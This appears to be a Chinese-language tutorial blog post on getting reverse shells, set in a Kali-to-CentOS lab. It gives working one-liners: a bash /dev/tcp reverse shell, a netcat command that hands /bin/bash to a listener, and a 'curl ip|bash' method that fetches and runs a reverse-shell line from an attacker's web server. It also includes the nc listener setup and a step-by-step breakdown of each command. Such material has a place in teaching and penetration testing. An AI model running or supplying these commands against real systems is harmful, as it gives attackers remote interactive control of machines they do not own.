1.bash反弹shell
个人感觉bash反弹是最简单、也是最常见的一种。
bash -i >& /dev/tcp/192.168.20.151/8080 0>&1
bash一句话命令详解以下针对常用的bash反弹一句话进行了拆分说明,具体内容如下。
其实以上bash反弹一句完整的解读过程就是:
bash产生了一个交互环境与本地主机主动发起与目标主机8080端口建立的连接(即TCP 8080 会话连接)相结合,然后在重定向个tcp 8080会话连接,最后将用户键盘输入与用户标准输出相结合再次重定向给一个标准的输出,即得到一个bash 反弹环境。在反弹shell时要借助netcat工具反弹
Netcat 一句话反弹:Netcat反弹也是非常常用的方法,只是这个方法需要我们手动去安装一个NC环境
开启外网主机监听
root@kali:~# nc -lvvp 8080
listening on [any] 8080 ...
kali : 192.168.20.151centos:192.168.20.130
先用kali开启监听:然后centos执行bash一句话。
成功反弹。
2.netcat 一句话反弹
~ nc 192.168.31.151 7777 -t /bin/bash
命令详解:通过webshell我们可以使用nc命令直接建立一个tcp 8080 的会话连接,然后将本地的bash通过这个会话连接反弹给目标主机(192.168.31.151)。
先开启监听7777端口。
3.curl反弹shell
前提要利用bash一句话的情况下使用curl反弹shell
在存在命令执行的服务器上执行curl ip|bash,该ip的index文件上含有bash一句话,就可以反弹shell。
例如在自己的服务器index上写上一句话
bash -i >& /dev/tcp/192.168.20.151/7777 0>&1
192.168.20.151就是作为监听端口的服务器用来得到反弹的shell。
存在一句话,利用curl反弹。kali开启监听
上述内容不知道大家学习到了吗?网络世界的安全漏洞每天都会出现,安全知识和安全意识每个公民都应该了解和学习,有想学习网络安全技能的小伙伴可以随时私信我哦!